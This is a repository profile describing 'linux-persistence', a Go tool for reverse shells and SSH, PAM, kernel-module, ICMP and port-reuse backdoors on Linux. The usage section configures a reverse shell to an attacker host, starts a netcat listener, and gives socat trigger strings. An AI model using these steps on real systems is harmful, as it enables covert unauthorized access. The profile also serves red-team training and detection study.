{"name":"linux-persistence: A Go-based Linux Persistence Tool for Security Research","description":"linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.","github":"https://github.com/Maikefee/linux-persistence","url":"https://osrepos.com/repo/maikefee-linux-persistence","source":"osrepos.com","sourceDescription":"This repository profile is provided by osrepos.com, an open source repository discovery platform.","repositoryProfile":"https://osrepos.com/repo/maikefee-linux-persistence","generatedFor":"open source discovery and AI-assisted research","markdown":"https://osrepos.com/repo/maikefee-linux-persistence.md","json":"https://osrepos.com/repo/maikefee-linux-persistence.json","topics":["Go","Linux","Persistence","Security","Penetration Testing","Red Team","Backdoor","Ethical Hacking"],"keywords":["Go","Linux","Persistence","Security","Penetration Testing","Red Team","Backdoor","Ethical Hacking"],"stars":null,"summary":"linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.","content":"## Introduction\n\n`linux-persistence` is a robust Linux persistence tool, meticulously crafted in Go. It provides a comprehensive suite of techniques designed to maintain unauthorized access on Linux systems. This tool is intended solely for authorized security research, penetration testing, red team exercises, and security awareness training. 
Users are strongly advised to adhere to ethical guidelines and local laws, as misuse can lead to severe consequences.\n\nThe repository showcases a wide array of persistence methods, including reverse shells, SSH backdoors, hidden files, cron backdoors, Setuid backdoors, PAM backdoors, kernel module backdoors, ICMP backdoors, DNS backdoors, VIM backdoors, Strace backdoors, and port reuse backdoors. Each technique offers a unique approach to achieving and maintaining system access.\n\n## Installation\n\nTo get `linux-persistence` up and running, you'll need to compile it from source. Ensure you have the necessary dependencies installed on your Linux system, including a GCC compiler, Linux kernel development headers, PAM development library, `iptables`, and `netcat` or `socat`.\n\nFirst, clone the repository:\n```bash\ngit clone https://github.com/Maikefee/linux-persistence.git\ncd linux-persistence\n```\n\nThen, compile the tool:\n```bash\ngo build -o linux-persistence main.go\n```\n\n## Examples\n\nFor optimal results, it is recommended to run `linux-persistence` with root privileges.\n\n**Basic Usage:**\n```bash\nsudo ./linux-persistence\n```\n\n**Configuration Options:**\nYou can customize various settings by modifying the `config` struct in `main.go` before compilation:\n```go\nvar config = Config{\n    ReverseShellHost: \"192.168.1.100\",  // Reverse shell target host\n    ReverseShellPort: 4444,             // Reverse shell target port\n    BackdoorPort:     6666,             // VIM backdoor listening port\n    HiddenProcess:    \"systemd-resolved\", // Hidden process name\n    SSHBackdoorPort:  2222,             // SSH backdoor port\n}\n```\n\n**Using the Reverse Shell:**\n1.  **Prepare Listener:** On your attacker machine, start a netcat listener:\n    ```bash\n    nc -lvp 4444\n    ```\n2.  
**Run Tool:** On the target machine, execute the tool (it will attempt to connect to the configured `ReverseShellHost:ReverseShellPort`):\n    ```bash\n    sudo ./linux-persistence\n    ```\n\n**Using the SSH Backdoor:**\nAfter running the tool on the target, you can connect via SSH:\n```bash\nssh -p 2222 root@target_ip\n```\n\n**Port Reuse:**\nActivate port reuse by sending a specific string:\n```bash\necho 'backdoor' | socat - tcp:target_ip:80\n```\nDeactivate port reuse:\n```bash\necho 'close' | socat - tcp:target_ip:80\n```\n\n**ICMP Backdoor:**\nThe ICMP backdoor is triggered by sending an ICMP packet containing the string \"backdoor\".\n\n## Why Use `linux-persistence`?\n\n`linux-persistence` stands out as a valuable resource for anyone involved in offensive security, security research, or defensive training. Its implementation in Go ensures efficiency and a relatively small footprint. The tool's strength lies in its comprehensive collection of diverse persistence techniques, offering practical insights into how adversaries maintain access on Linux systems.\n\nFor security professionals, it serves as an excellent educational platform to understand, simulate, and ultimately develop robust detection and protection strategies against various persistence mechanisms. The README also provides valuable information on detection methods (e.g., `netstat -an`, `ps aux`, `crontab -l`, `lsmod`) and protection recommendations (e.g., regular integrity checks, HIDS/NIDS deployment, restricting root privileges), making it useful for both red and blue teams.\n\n## Links\n\n*   **GitHub Repository:** [https://github.com/Maikefee/linux-persistence](https://github.com/Maikefee/linux-persistence)\n*   **Blog Post URL:** [https://osrepos.jalab.pt/repo/maikefee-linux-persistence](https://osrepos.jalab.pt/repo/maikefee-linux-persistence)","metrics":{"detailViews":5,"githubClicks":7},"dates":{"published":null,"modified":"2025-10-11T21:12:52.000Z"}}